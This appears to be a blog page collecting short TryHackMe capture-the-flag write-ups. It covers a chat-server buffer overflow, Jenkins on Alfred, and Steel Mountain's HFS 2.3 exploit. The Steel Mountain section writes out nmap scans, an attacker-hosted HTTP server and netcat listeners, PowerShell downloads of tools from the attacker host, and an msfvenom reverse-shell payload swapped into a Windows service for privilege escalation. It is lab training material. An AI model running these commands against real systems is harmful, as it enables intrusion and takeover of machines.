Reverse engineer a chat program and write a script to exploit a Windows machine.

Image for post
Image for post

NMAP Scan:

nmap -sC -sV -Pn -T4 10.10.175.210 — disable-arp -oX chatserver_nmap.xml

  • sC = default scrip scan
  • sV = version scan
  • n = disable DNS resolution
  • T4 = Aggressive scan
Image for post
Image for post

First step is to grab the chatserver.exe and essfunc.dll using ftp from the target machine to your local machine for debugging.

Image for post
Image for post

Open Immunity Debugger as Administrator from your local machine then attach chatserver.exe and hit F9 to run the program.

Image for post
Image for post

Check how the application behaves using netcat. …


Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

[1]NMAP Scan

sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred

Image for post
Image for post

[2]Visit Webpage

http://10.10.131.184:8080

Image for post
Image for post

[3]Brute force login page

Capture login traffic using burpsuite:

Image for post
Image for post

Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.

Image for post
Image for post

Machine Information:

Image for post
Image for post

[1]NMAP Scan

sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan

Image for post
Image for post

[2]Research vulnerability

searchsploit hfs 2.3
searchsploit -x 39161.py

Image for post
Image for post

[3]Edit exploit

Image for post
Image for post

[4]Setup HTTP server to serve nc.exe and winPEAS

sudo python -m SimpleHTTPServer 80

Image for post
Image for post

[5]Setup a netcat listener then run exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080

Image for post
Image for post
Image for post
Image for post

[6]Download winPEAS for Privilege Escalation

powershell -c “Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe”

Image for post
Image for post
Image for post
Image for post

[7]Run winPEAS

winPEAS.exe

Image for post
Image for post
Image for post
Image for post

[8]Create msfvenom payload and setup a netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234

Image for post
Image for post

[9]Stop service

sc stop AdvancedSystemCareService9

Image for post
Image for post

[10]Download payload under the directory of the target service then start service

powershell -c “Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9

Image for post
Image for post
Image for post
Image for post
Image for post
Image for post

References:

https://tryhackme.com/room/steelmountain

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

About

scryptk1ddy

Experienced Network Security Engineer with a demonstrated history of working in the field of IT security industry.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store